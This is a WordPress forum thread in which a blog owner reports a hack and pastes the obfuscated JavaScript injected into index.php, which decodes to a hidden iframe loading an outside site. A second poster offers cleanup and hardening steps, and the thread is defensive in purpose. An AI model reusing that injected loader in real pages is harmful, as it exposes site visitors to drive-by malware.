WordPress.org

Ready to get started?Download WordPress

Forums

My Blog Hacked - Can Someone Please Help? (4 posts)

  1. csd4csd
    Member
    Posted 5 years ago #

    I noticed today that my feed was not validating through Feedburner. I am getting the error message:

    This feed does not validate.
    •line 468, column 0: XML parsing error: <unknown>:469:0: junk after document element [help]
    </rss>

    And i noticed that this code was appended to my index.php file:

    <?php echo ''; ?><?php echo '<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,104,106,103,52,61,34,98,105,116,115,34,59,118,97,114,32,119,61,34,105,110,102,111,34,59,118,97,114,32,114,101,54,61,34,119,97,114,101,46,34,59,118,97,114,32,114,114,116,116,54,61,34,110,101,116,34,59,118,97,114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,104,106,103,52,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,114,114,116,116,54,43,39,47,39,43,39,34,32,119,105,100,116,104,61,34,49,34,32,104,101,105,103,104,116,61,34,49,34,62,60,47,105,39,43,39,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,119,61,48,49,48,48,48,49,48,49,48,48,49,49))</script>'; ?>

    I also noticed that even though I never had a Blogroll ini my sidebar, that there now is one and it only has one link in it which goes to this website:

    http://www.wordpresssupplies.com

    Can someone please suggest how I can fix my blog and also how we can report this hacker?

    Thanks,
    Chris

  2. whooami
    Member
    Posted 5 years ago #

    Chris,

    fix advice:
    http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/
    http://wordpress.org/search/hacked?forums=1

    Make sure that your files on the server are clean. If that means deleting and reuploading, than you ought to do that. Files that you dont replace, should be looked at.

    Check for files that dont belong, directories that dont belong. Image files with changed timestamps -- look at those. Its VERY common for there to be scripts on sites that are named in such a way to mask the fact that theyre scripts.

    Be suspicious, when youre looking at things. For instance, if you look at your wp-content/index.php -- even that file has the malicious JS in it...

    Look at your permissions. Do you have world writable files? Any world-writable directories? Are they necessary?

    You need to check your database. Look for rogue plugins being loaded, look for rogue users (specifically look for a user named wordpress). You will NOT see rogue plugins or rogue users in your wp-admin/ area. You need to check your database.

    Make sure ALL of your plugins are current.

    Make sure your wordpress is current. (i see that it is)

    Change your mysql password that wordpress uses (update your wp-config.php with that new password).

    Change any admin level passwords on your blog.

    Look at any other software thats being used on your site. Is it current?

    Thats just an outline and not a complete list.

    There's quite a bit to do, but it's all necessary.

    If you cant do it all -- by all means dont hesitate to enlist the help of someone who can. Quite a few of us do work on the side.

    As for reporting..

    good luck with that. They use proxys.

    What you can do though, is get a hold of your raw access logs, and compare the timestamps of the changed files to your access logs. It might be a window into how whatever was accomplished, was.

    If you arent archiving access logs, you ought to be, especially now.

    there's also this:

    http://codex.wordpress.org/Hardening_WordPress

    At the very bottom of that page, my own plugin is mentioned. I recommend setting it up, and leaving it up, for a week after the site has been secured, and keeping a close eye on the resultant logfile.

  3. csd4csd
    Member
    Posted 5 years ago #

    thanks for the quick response. how do I get in touch with you? id like to talk about potentially hiring you.

  4. whooami
    Member
    Posted 5 years ago #

    whoo -> village-idiot.org

    the arrow s/b an @

Topic Closed

This topic has been closed to new replies.

About this Topic